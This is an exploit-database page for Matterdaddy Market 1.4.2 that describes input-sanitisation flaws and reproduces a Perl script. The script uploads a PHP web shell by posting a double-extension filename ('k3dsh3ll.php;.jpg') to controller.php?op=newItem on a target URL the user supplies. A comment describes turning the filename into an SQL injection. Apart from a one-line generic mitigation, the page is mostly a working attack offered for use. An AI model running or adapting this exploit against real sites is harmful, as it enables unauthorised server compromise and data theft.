header-logo
Suggest Exploit
vendor:
Matterdaddy Market
by:
KedAns-Dz
8,8
CVSS
HIGH
Multiple Security Vulnerabilities
N/A
CWE
Product Name: Matterdaddy Market
Affected Version From: Matterdaddy Market 1.4.2
Affected Version To: Matterdaddy Market 1.4.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Matterdaddy Market 1.4.2 File Uploader Fuzzer

Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Sanitize user-supplied data.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/60150/info

Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|=   Matterdaddy Market 1.4.2 File Uploader Fuzzer   |
|=         >> Provided By KedAns-Dz <<               |
|=          e-mail : ked-h[at]hotmail.com            |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
    chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
        Content_Type => 'multipart/form-data',
        Content      =>
            [
        'md_title' => '1337day',
        'md_description' => 'Inj3ct0r Exploit Database',
        'md_price' => '0',
        'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
        'city' => 'Hassi Messaoud',
        'namer' => 'KedAns-Dz',
        'category' => '4',
        'filetoupload' => $file,
    'filename' => 'k3dsh3ll.php;.jpg',
 # to make this exploit as sqli change file name to :
 # k3dsh3ll' [+ SQLi +].php.jpg
 # use temperdata better ;)
        ] );
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
    else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;

Navigation

Suggest Exploit

Services By CQR